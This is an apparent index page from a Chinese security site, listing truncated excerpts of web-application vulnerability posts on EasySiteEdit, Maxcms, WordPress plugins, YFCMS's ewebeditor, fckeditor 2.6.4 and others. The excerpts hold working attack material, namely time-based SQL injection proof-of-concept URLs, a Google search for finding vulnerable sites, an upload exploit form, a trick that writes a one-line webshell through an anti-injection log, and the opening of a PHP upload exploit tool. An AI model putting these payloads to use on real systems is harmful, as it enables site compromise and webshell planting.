EasySiteEdit远程文件包含缺陷及修复
Exploit Title: EasySiteEdit remote file include 作者:koskesh jakesh 下载地址: http://www.easysiteedit.com/licensesystem/esev2versions/esev2.zip # Tested on: linux ------------------------------- vul:sublink...
盛大云网站配置不当导致文件解析漏洞及修复
简要描述:盛大云网站存在漏洞,可以直接获得网站权限。 详细说明:nginx文件解析漏洞 漏洞证明:<A href="https://www.webshell.cc/robots.txt/x.<a%20href=" target=_blank http: www.webshell.cc kf web php ?>php">https://www.webshell.cc/robot...
mysql数据截断
LengF:在看《PHP高级漏洞审核技术》认真的看了这两点,暂且记下。 对于很多web应用文件在很多功能是不容许重复数据的,比如用户注册功能等。一般的应用程序对于提交注册的username和数据库里已有的username对比是不是已经有重复数据,然而我们可以通过“数据截断”等来饶过这些判断,数据库在处理时候产生截断导致插入重复数据。 1) Mysql SQL Column Truncation V...
马克斯CMS(Maxcms) admin_inc.asp SQL注入漏洞及修复
在文件admin/ admin_inc.asp中: Sub checkPower //第103行 dim loginValidate,rsObj : loginValidate = "maxcms2.0" err.clear on error resume next set rsObj=conn.db("select m_random,m_level from {pre}manager where...
asp.net+mysql后台盲注入
后台的登录注入点,不过悲剧的是无回显只能盲注。更悲剧的是mysql数据库是5一下的版本! 不过还好站点是asp.net程序的使程序报错后能显示一些信息。 正文开始吧。 目标站点找了一圈没发现入口点,旁站没几个,不过幸运的是发现了个登录框的注入点!(应为这个旁站只有一个登录入口!) 刚开是在用户名那里输入了 admin'-- 报错了 You have an error in your SQL syn...
WordPress多个插件注入漏洞及修复
1: OdiHost Newsletter plugin <= 1.0 POC: https://www.webshell.cc/wp-content/plugins/odihost-newsletter-plugin/includes/openstat.php?uid=-1&id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,11...
YFCMS之ewebeditor上传漏洞及修复
google关键字:intext:版权所有:yfcms 利用文件:admin\WebEditor\asp\upload.asp 利用代码: <form action="http://www.badguest.cn/admin/WebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=st999...
关于迅雷离线功能存在设计漏洞
本人一直都在共享着自己使用的VIP迅雷账号, 但更新过几次都是在几天之后提示密码错误, 用密保把密码改回来发现安全邮箱被改成@QQ.COM的 E-Mail地址了 用IE8.0更改无法查看“老是提示验证码错误”,用Opera浏览器可看到一半(如图) 我自己从来都没用QQ E-mail做为安全邮箱,进迅雷离线发现原来可以在离线功能处可以更改安全邮箱(如图) PS:共享迅雷VIP账号有风...
提交’时提示ip被记录 防注入系统的利用
例如: 网址:https://www.webshell.cc/newslist.asp?id=122′ 提示“你的操作已被记录!”等信息。 利用方法:https://www.webshell.cc/sqlin.asp 看是否存在,存在提交https://www.webshell.cc/newslist.asp?id=122‘excute(request("mima"))写入一句话
fckeditor 2.6.4 任意文件上传漏洞
描述:fckeditor 详细说明:currentfolder过滤不给力啊,但是GPC就能让它脑残!下面是利用工具! 利用: <? error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); define(STDIN, fopen("php://stdin", "r")); $match = arr...